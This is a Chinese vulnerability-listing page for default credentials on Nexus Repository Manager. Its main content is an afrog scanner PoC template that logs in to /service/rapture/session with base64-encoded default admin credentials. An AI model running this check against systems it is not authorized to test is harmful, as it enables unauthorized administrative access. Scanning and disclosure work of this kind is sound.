nexus-default-password: Nexus Default Password

日期: 2025-09-01 | 影响软件: Nexus | POC: 已公开

漏洞描述

body="Nexus Repository Manager"

PoC代码[已公开]

id: nexus-default-password

info:
    name: Nexus Default Password
    author: Soveless(https://github.com/Soveless)
    severity: high
    verified: true
    description: body="Nexus Repository Manager"

rules:
    r0:
        request:
            method: POST
            path: /service/rapture/session
            headers:
                X-Nexus-UI: true
            body: username=YWRtaW4%3D&password=YWRtaW4xMjM%3D
        expression: response.status == 204 && response.raw_header.bcontains(b'NXSESSIONID')
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/default-pwd/nexus-default-password.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2019-7238: NEXUS < 3.14.0 Remote Code Execution POC

CVE-2020-10199: Nexus Repository before 3.21.2 allows JavaEL Injection POC

CVE-2024-4956: Nexus Repository Manager 文件读取漏洞 POC

SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

D-Link DIR-645 命令注入漏洞 无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞无POC

D-Link DIR-645 命令注入漏洞无POC